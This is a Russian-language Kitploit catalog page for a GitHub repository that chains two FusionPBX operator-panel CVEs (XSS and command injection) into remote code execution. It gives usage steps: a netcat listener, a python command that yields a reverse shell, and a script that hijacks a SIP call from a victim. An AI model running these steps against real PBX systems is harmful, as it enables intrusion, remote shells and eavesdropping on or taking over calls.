Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
fusionpbx_rce_vulnerability — Связка CVE-2019-11408 – XSS в панели оператора и CVE-2019-11409 – внедрение команд в панели оператора. | Kitploit
Инструменты/GitHubGitHub/hoseynheydari/fusionpbx_rce_vulnerability
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubhoseynheydari/fusionpbx_rce_vulnerability

fusionpbx_rce_vulnerability

Связка CVE-2019-11408 – XSS в панели оператора и CVE-2019-11409 – внедрение команд в панели оператора.

Репозиторий
22 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Прелюдия

Этот простой код пытается завершить реализацию цепочки уязвимостей, представленной Дастином Коббом в статье RCE через Caller ID – множественные уязвимости в FusionPBX.

RCE

Шаги воспроизведения

  1. Откройте уязвимый экран оператора в веб-браузере, расположенный в данном примере по адресу https://{fusionpbx_address}/app/operator_panel/index.php
  2. Запустите netcat слушатель на удалённой системе (rce_listener_address).x`
  3. Запустите код эксплойта ниже на удалённой системе в другом окне терминала python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}
  4. Эксплойт подключится к netcat-слушателю и предоставит обратную оболочку (reverse shell)

Подмена вызова

Если мы знаем Call-ID, from-tag и to-tag вызова, запуск приведённого ниже кода подставит вас в вызов вместо жертвы.

Шаги воспроизведения

  1. Сначала инициируйте вызов между двумя SIP UA.
  2. После установления вызова нужно сконструировать dialog_identifier путём конкатенации {Call-ID}{semicolon}"to-teg:"{to-tag}"from-tag"{from-tag}.
  3. Запустите приведённый ниже код перехватчика на удалённой системе, и он подставит вместо вас номер жертвы. python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}
Скачать инструмент